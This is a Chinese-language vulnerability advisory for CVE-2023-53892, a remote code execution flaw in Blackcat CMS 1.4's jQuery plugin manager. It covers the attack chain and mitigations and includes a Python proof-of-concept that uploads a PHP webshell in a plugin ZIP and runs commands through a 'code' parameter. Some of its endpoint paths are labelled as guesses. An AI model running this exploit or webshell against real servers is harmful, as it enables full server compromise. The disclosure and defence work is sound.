CVE-2023-53892 Blackcat CMS 1.4 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2023-53892

漏洞类型

远程代码执行

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Blackcat CMS

漏洞概述

CVE-2023-53892是Blackcat CMS 1.4版本中的一个高危远程代码执行漏洞。该漏洞存在于jQuery插件管理器功能中，允许经过身份验证的管理员用户通过上传恶意构造的ZIP压缩包来注入恶意PHP代码。由于Blackcat CMS在插件上传过程中缺乏对文件内容的充分安全验证，攻击者可以绕过基本的安全检查，上传包含恶意PHP脚本的插件包。一旦恶意PHP文件被上传到服务器，攻击者可以通过HTTP请求访问该文件，并利用特定的参数（如'code'参数）执行任意系统命令，从而完全控制服务器。Blackcat CMS是一款基于PHP和MySQL的开源内容管理系统，广泛应用于中小型网站和企业内部系统。此漏洞的CVSS评分为7.2，属于高危级别，攻击向量为网络，认证要求为高权限，无需用户交互即可实现攻击。漏洞的机密性、完整性和可用性影响均为高。对于部署了Blackcat CMS 1.4版本的组织机构，建议立即采取修复措施，避免遭受远程代码执行攻击。

技术细节

该漏洞的技术原理主要涉及Blackcat CMS的jQuery插件管理器功能的安全缺陷。具体来说：1) 插件上传机制存在缺陷：系统允许管理员上传ZIP格式的插件压缩包，但在解压和安装过程中没有对PHP文件内容进行充分的恶意代码检测。2) 文件存储位置可预测：上传的插件文件会被存储在可预测的Web访问目录下，使得攻击者可以直接通过HTTP请求访问上传的恶意PHP文件。3) 参数注入点：恶意PHP脚本中包含可被触发的代码执行逻辑，通过'code'参数可以注入任意系统命令。攻击者构造的恶意PHP脚本示例可能包含如system($_GET['code'])或eval(base64_decode($_GET['code']))等代码。4) 权限提升：由于管理员账户本身就具有较高的系统权限，攻击成功后可以直接以Web服务器运行账户的权限执行命令，可能进一步实现权限提升或横向移动。整个攻击过程不需要额外的用户交互，攻击者只需具备有效的管理员凭证即可。

攻击链分析

STEP 1

步骤1

获取管理员凭证：攻击者通过暴力破解、钓鱼攻击或社工手段获取Blackcat CMS管理员账户的有效用户名和密码

STEP 2

步骤2

构造恶意插件包：攻击者创建一个包含恶意PHP脚本的ZIP压缩包，PHP脚本中包含如system($_GET['code'])的命令执行代码

STEP 3

步骤3

上传恶意插件：使用管理员账户登录Blackcat CMS后台，访问jQuery插件管理器，上传构造好的恶意ZIP文件

STEP 4

步骤4

触发代码执行：访问上传的恶意PHP文件，通过URL中的'code'参数注入系统命令，如?code=whoami

STEP 5

步骤5

完全控制服务器：成功执行命令后，攻击者可以部署后门、窃取数据、植入挖矿程序或进行横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import zipfile
import requests
import sys

# CVE-2023-53892 PoC - Blackcat CMS RCE via jQuery Plugin Manager
# Target: Blackcat CMS 1.4
# Author: VulnCheck

TARGET_URL = 'http://target.com/blackcat'  # Change to target URL
USERNAME = 'admin'  # Change to valid admin username
PASSWORD = 'admin123'  # Change to valid password

def create_malicious_plugin():
    """Create a malicious plugin ZIP file with PHP webshell"""
    # Malicious PHP code that executes system commands via 'code' parameter
    webshell_content = '''<?php
if(isset($_GET['code'])) {
    system($_GET['code']);
}
?>'''
    
    # Create plugin info file
    plugin_info = '''<?xml version="1.0"?>
<package version="2.0" name="MaliciousPlugin" type="plugin">
    <name>MaliciousPlugin</name>
    <version>1.0</version>
    <description>Malicious plugin for testing</description>
</package>'''
    
    # Create ZIP file
    zip_filename = 'malicious_plugin.zip'
    with zipfile.ZipFile(zip_filename, 'w') as zip_file:
        zip_file.writestr('info.php', plugin_info)
        zip_file.writestr('index.php', webshell_content)
    
    return zip_filename

def exploit():
    """Main exploitation function"""
    print('[+] CVE-2023-53892 PoC - Blackcat CMS RCE')
    print('[+] Target: ' + TARGET_URL)
    
    # Step 1: Login as admin
    session = requests.Session()
    login_url = TARGET_URL + '/admin/login'
    login_data = {'username': USERNAME, 'password': PASSWORD}
    
    response = session.post(login_url, data=login_data)
    if 'login' in response.url.lower():
        print('[-] Login failed!')
        return
    print('[+] Login successful!')
    
    # Step 2: Upload malicious plugin
    plugin_url = TARGET_URL + '/jquery_plugin_manager/upload'
    zip_file = create_malicious_plugin()
    
    files = {'plugin_zip': (zip_file, open(zip_file, 'rb'), 'application/zip')}
    response = session.post(plugin_url, files=files)
    
    if response.status_code == 200:
        print('[+] Plugin uploaded successfully!')
        # Extract the uploaded plugin path from response
        # Usually: /blackcat/plugins/malicious_plugin/index.php
        webshell_url = TARGET_URL + '/plugins/malicious_plugin/index.php'
        print('[+] Webshell URL: ' + webshell_url)
        
        # Step 3: Execute command
        cmd = 'whoami'  # Default command
        if len(sys.argv) > 1:
            cmd = sys.argv[1]
        
        exploit_url = webshell_url + '?code=' + cmd
        response = session.get(exploit_url)
        print('[+] Command output: ' + response.text.strip())
    else:
        print('[-] Plugin upload failed!')

if __name__ == '__main__':
    exploit()

影响范围

Blackcat CMS 1.4

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1) 临时禁用jQuery插件管理器功能，防止上传新的插件；2) 对plugins目录设置严格的文件权限，禁止.php文件的写入和执行；3) 通过Web服务器配置（如Apache的.htaccess或Nginx配置）禁止直接访问plugins目录下的PHP文件；4) 加强管理员账户安全，使用强密码并启用多因素认证；5) 部署Web应用防火墙规则，监控和阻止异常的文件上传行为；6) 定期检查plugins目录是否存在未知文件，及时清除可疑文件；7) 限制管理员后台的访问IP范围，仅允许内网IP访问管理后台。